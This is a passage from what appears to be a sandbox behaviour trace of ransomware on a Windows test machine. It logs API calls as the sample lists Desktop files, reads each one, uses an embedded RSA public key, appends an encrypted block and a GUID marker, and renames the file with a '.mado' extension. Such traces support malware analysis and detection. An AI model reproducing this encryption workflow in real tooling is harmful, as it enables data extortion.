nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0203.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.826] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0203.826] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9643500, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x74f00840, ftLastAccessTime.dwHighDateTime=0x1d5d8ac, ftLastWriteTime.dwLowDateTime=0x74f00840, ftLastWriteTime.dwHighDateTime=0x1d5d8ac, nFileSizeHigh=0x0, nFileSizeLow=0x18059, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="elKgZ adOre6qYbXG.odp", cAlternateFileName="ELKGZA~1.ODP")) returned 1 [0203.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.826] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\elKgZ adOre6qYbXG.odp") returned=".odp" [0203.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\elKgZ adOre6qYbXG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elkgz adore6qybxg.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.826] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=98393) returned 1 [0203.826] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.829] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18033, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.829] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.830] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x18059, lpOverlapped=0x0) returned 1 [0203.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.831] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.831] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.832] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.832] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.832] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.832] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.832] GetLastError () returned 0x0 [0203.832] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.832] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.832] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.832] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.832] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.833] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.833] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18059, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.833] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.834] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.834] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.834] CloseHandle (hObject=0x63c) returned 1 [0203.835] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\elKgZ adOre6qYbXG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elkgz adore6qybxg.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\elKgZ adOre6qYbXG.odp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\elkgz adore6qybxg.odp.mado")) returned 1 [0203.838] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa94b5e30, ftCreationTime.dwHighDateTime=0x1d5e7ea, ftLastAccessTime.dwLowDateTime=0x30979610, ftLastAccessTime.dwHighDateTime=0x1d5e723, ftLastWriteTime.dwLowDateTime=0x30979610, ftLastWriteTime.dwHighDateTime=0x1d5e723, nFileSizeHigh=0x0, nFileSizeLow=0x114f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f2y6WykfmB1T.flv", cAlternateFileName="F2Y6WY~1.FLV")) returned 1 [0203.838] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2y6WykfmB1T.flv") returned=".flv" [0203.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2y6WykfmB1T.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f2y6wykfmb1t.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.839] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=70904) returned 1 [0203.839] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.841] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x114d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.841] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.842] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x114f8, lpOverlapped=0x0) returned 1 [0203.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.843] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.844] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.844] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.844] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.844] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.844] GetLastError () returned 0x0 [0203.844] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.844] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.844] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.844] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.844] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.845] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.845] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x114f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.845] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.845] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.845] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.845] CloseHandle (hObject=0x63c) returned 1 [0203.847] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2y6WykfmB1T.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f2y6wykfmb1t.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\f2y6WykfmB1T.flv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\f2y6wykfmb1t.flv.mado")) returned 1 [0203.848] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fa8fbd0, ftCreationTime.dwHighDateTime=0x1d5dedc, ftLastAccessTime.dwLowDateTime=0xb2934790, ftLastAccessTime.dwHighDateTime=0x1d5dc3d, ftLastWriteTime.dwLowDateTime=0xb2934790, ftLastWriteTime.dwHighDateTime=0x1d5dc3d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fDly50O", cAlternateFileName="")) returned 1 [0203.849] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a0eb270, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0x58742750, ftLastAccessTime.dwHighDateTime=0x1d5dff0, ftLastWriteTime.dwLowDateTime=0x58742750, ftLastWriteTime.dwHighDateTime=0x1d5dff0, nFileSizeHigh=0x0, nFileSizeLow=0xe0cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hAxdwDH31tOgP85.m4a", cAlternateFileName="HAXDWD~1.M4A")) returned 1 [0203.849] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hAxdwDH31tOgP85.m4a") returned=".m4a" [0203.849] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hAxdwDH31tOgP85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haxdwdh31togp85.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.849] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=57547) returned 1 [0203.849] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.851] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe0a5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.851] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.852] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe0cb, lpOverlapped=0x0) returned 1 [0203.853] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.853] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.853] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.853] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.854] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.854] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.854] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.854] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.854] GetLastError () returned 0x0 [0203.854] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.854] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.854] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.854] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.854] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.855] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.855] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe0cb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.855] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.855] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.855] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.855] CloseHandle (hObject=0x63c) returned 1 [0203.857] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hAxdwDH31tOgP85.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haxdwdh31togp85.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\hAxdwDH31tOgP85.m4a.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\haxdwdh31togp85.m4a.mado")) returned 1 [0203.858] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37a60420, ftCreationTime.dwHighDateTime=0x1d5da0b, ftLastAccessTime.dwLowDateTime=0xd26fe100, ftLastAccessTime.dwHighDateTime=0x1d5d86d, ftLastWriteTime.dwLowDateTime=0xd26fe100, ftLastWriteTime.dwHighDateTime=0x1d5d86d, nFileSizeHigh=0x0, nFileSizeLow=0x12050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N_1fqFQPI_Z.m4a", cAlternateFileName="N_1FQF~1.M4A")) returned 1 [0203.858] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N_1fqFQPI_Z.m4a") returned=".m4a" [0203.858] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N_1fqFQPI_Z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n_1fqfqpi_z.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.858] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=73808) returned 1 [0203.858] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.860] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1202a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.860] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.862] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x12050, lpOverlapped=0x0) returned 1 [0203.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.863] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC 